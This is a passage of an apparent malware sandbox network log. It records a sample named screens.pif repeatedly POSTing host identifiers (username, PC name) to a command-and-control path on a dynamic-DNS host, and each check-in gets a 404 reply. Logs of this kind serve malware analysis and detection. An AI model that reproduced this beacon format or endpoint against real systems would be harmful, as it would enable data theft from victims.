                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:13.963378906 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:14.643101931 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:14 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.104973245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:14.806760073 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:14.812196016 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:15.448180914 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:14 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.104973345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:15.625766993 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:15.631001949 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:17.426115990 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:16 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.104973445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:17.613740921 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:17.618666887 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:18.676727057 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:17 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.104973545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:18.843678951 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:18.848565102 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:19.691886902 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:19 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.104973645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:20.067845106 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:20.073299885 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:20.383909941 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:20.718350887 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:20 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.104973745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:20.889588118 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:20.894548893 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:21.526664019 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:21 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.104973845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:21.704443932 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:21.709486008 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:22.447510004 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:21 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.104973945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:22.726998091 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:22.731827021 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:23.391484976 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:22 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.104974045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:23.536640882 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:23.541526079 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:24.274101019 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:23 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.104974145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:24.424740076 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:24.429750919 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:25.101639986 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:24 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.104974245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:25.251813889 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:25.256730080 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:25.961544037 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:25 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.104974345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:26.113770008 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:26.118736029 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:26.738610029 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:26 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.104974445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:26.892745018 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:26.897708893 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:27.713023901 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:27 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.104974545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:27.867804050 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:27.873598099 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:28.560340881 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:28 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.104974645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:28.706788063 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:28.712017059 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:29.491594076 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:29 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.104974745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:29.649656057 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:29.654591084 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:30.421461105 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:29 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.104974945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:30.586230993 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:30.592777014 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:31.421685934 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:30 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.104975045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:32.595339060 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:32.603611946 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:33.372004032 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:32 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.104975145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:33.521265984 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
